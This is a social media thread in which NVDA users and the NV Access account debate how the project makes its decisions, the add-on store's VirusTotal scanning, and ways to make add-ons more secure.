@fastfinge I wish so much of this wasn't on-point.
* I don't have enough of an understanding of the addon store stuff to be informed, but pulling Remote into core seemed a lot of work for relatively little gain to me. * the on-device description stuff was mad, given the profusion of other addons already out there and its crapness when they did work on it, * and the lack of a bridge from 64 bit felt like a kick in the teeth. as you say: the move was needed, but the support for developers fell short.
I love NVDA and will champion it, but I do wonder about the direction and decisionmaking sometimes.
@cachondo@fastfinge None of it is on point, and if he'd bothered taking the time to actually ask us any of the questions up front, we would happily have cleared up any confusion.
@NVAccess@cachondo So anyone with any questions at all should ask directly and in private? That doesn’t scale. The fact you can’t point anyone to the public places where these answers can be found is even worse.
@fastfinge No one said that. It's an open source project, discussion happens on the issue tracker and/or mailing list. Or you can ask them here. You know this. Should NVDA have a full time public relations person to handle all concerns? Who pays for that? What priorities suffer?
Your piece seems somewhat premised on the idea that you must trust NVAccess in an informational vacuum. I don't think that's true at all. You could just... ask them why they did XYZ. If that answer isn't satisfactory, okay, the discussion has moved forward.
@prism@cachondo@NVAccess It’s not based on that at all. It’s based on the fact that when I search the GitHub and mailing lists, as far as I can tell these discussions don’t exist.
@prism@cachondo@NVAccess Seems a bit late to discuss decisions that were already made…somewhere…by someone. Compare to the Linux kernel mailing list. If I want to know what was decided, who decided it, why they decided it, when and where, all discussion is right there. NVDA also operated this way up until the last couple years. When Michael or Jamie decided anything, the reasoning was all in public. Even if I didn’t like it, the chain of thought that got them there was fully visible.
@fastfinge@cachondo@prism As Drew suggested, what do you want to know? I'm only halfway through your article and most of it is "I don't like this feature, it shouldn't have taken developer time" when, if you'd asked, we could have told you that things like Remote Access, Image Description, Magnifier, etc you complain about - were all done by others and only overseen by us
@NVAccess@cachondo@prism If you have understood that to be my primary complaint, I must have written it extremely poorly. Because developer time was never even mentioned once. My complaint is that things seem to be going into NVDA without openly accessible discussion or reasoning about the trade offs. So: Why is NVDA scanning store addons with virustotal? What threat does NV Access believe this prevents, given the overall addon security landscape? What does NVAccess believe is the purpose of addons, and when should an addon be in core vs. Not? Are there types of addons that NVDA does not believe are suitable, and should just be apps on their own? What qualifies a feature for an addon vs. Being part of NVDA? How are decisions made at NV Access, now that they aren’t as frequently discussed on the GitHub or the mailing list? How should external stakeholders get involved in these decisions? Speaking of those decisions: what is the current thinking RE: the 32-bit compatibility layer? Has this been canceled as it’s no longer needed? What is the current thinking on the secure addon API? Are we talking about extremely restricted functionality, or code signing, or manual approval of secure addons, or all three? Where can we see, developers work opt planning (if any) being done on corporate mode? Surely there’s something other than “no news” on an issue tracker or mailing list somewhere. I’m avoiding “Why did you do X last year” style questions, as re-litigation of things already done is utterly pointless. But these are the current questions that I am most concerned about.
@fastfinge@cachondo@prism Ok if nothing else, I can no longer complain that you haven't asked us questions.... I'm confused about the hate on VirusTotal? It's a tool which may pick up malicious code that is available, so why NOT use it? Add-on vs core for a feature is done case by case (based on user benefit, potential downsides, initial vs ongoing work, & more. For remote, as previously noted, it also allowed us to tighten security by bringing those external contact points internal
@NVAccess@cachondo@prism The hate isn’t the service itself. It’s that the results are being displayed in the store. I believe that this is false reassurance, that makes everyone less secure just by existing. Best case, it will always return nothing, because no attacker would upload a virus directly to the store; they’ll have their addon download the virus days later, once it’s gotten some installs. Worst case, it makes someone think “Oh, NVDA virus scans its addons. So they’re fine.” Given the best case is nothing happens, and the worst case is someone is less secure, why do it? What problem is NVAccess trying to solve?
@fastfinge@cachondo@prism What do you propose? At the end of the day, add-ons are potentially a risk & I think we are clear in warning users about that. If a bad add-on has to download code days later to avoid detection, at least we've made it harder for them. The add-on community itself keeps an eye on add-ons & would hopefully quite quickly alert us to any issue such as this. The alternative would be extremely tightly restricting what add-ons could do - maybe to Braille drivers & synths?
@NVAccess@cachondo@prism Well, I would first propose not doing something “because the service exists and we can”. This was the kind of thinking I tried, and seem to have failed, to hilight in the article. Next, I would propose not getting stuck in an either or mindset. The duality of “we do nothing” or “we restrict all addons forever” is a false one.What about tracking reputation of addon authors and making sure that, at least, NV Access can guarantee that the author of an addon is who they say they are. Then making it extremely clear to users who they’re trusting and how much trust they’re handing over. What about having a set of “reviewed addons” and then a set of “unreviewed addons” and listing them in different places, with different levels of warning, and different corporate controls? What about some sort of sandboxing, and prompting the user “Do you want to allow this addon to X?” Where X is dangerous things like download and execute a third party program, read and write files outside of the addon directory, and so on. There are all sorts of possible solutions, some easier, and some harder, that would actually do something other than “Maybe inconvenience an attacker who knows nothing about NVDA Store security someday”.
@NVAccess@cachondo@prism Second reply to publicly call myself out for doing exactly the thing I’m annoyed about. I just proposed a raft of solutions without taking the time to fully understand the problem I’m solving for. Is the security problem: * NVDA needs to work with addons in sensitive enterprise environments * users need to be able to confidently install addons from the addon store without worrying * users need to be able to install random addons from the internet with at least some safety * security people need to be able to audit what an addon is doing * something else * all of the above
The best solution is going to depend on what the problem is, and what the available resources are for solving it.I shouldn’t have offered any solutions at all without understanding the shape of the problem. Because otherwise we’re just doing things because we feel like things should be done. Leading me to another question: does NVAccess clearly define what its problems are before it starts planning solutions to them? Or do planning and roadmaps start from the solution, rather than the problem to be solved? Because starting from the solution leads to decisions like scanning addons with an antivirus because it exists and you can.
